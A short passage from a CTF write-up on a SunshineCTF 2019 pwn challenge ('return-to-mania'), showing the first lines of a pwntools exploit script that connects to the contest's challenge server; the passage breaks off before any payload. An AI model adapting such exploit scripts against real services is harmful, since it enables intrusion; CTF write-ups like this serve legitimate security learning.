VermillionBird/CTF-Writeups/2019/SunshineCTF/pwn.md

 I then proceeded to use good old <a href='https://github.com/Gallopsled/pwntools'>pwntools</a> to start making my hack.
 Its a bit messy, so I added some comments to help.
 This was my final code.
 ```
 from pwn import *
 context.log_level = 'debug'               #debug mode, so I can see exactly what my code is doing.
-Suggested by kcolley
 r = remote('ret.sunshinectf.org',4301)    #connect to the service
 #r = process('./return-to-mania')         #comment out above line and uncomment this one to test locally
 data = r.recvuntil('\n')                  #receive the first line, but I don't care about it so...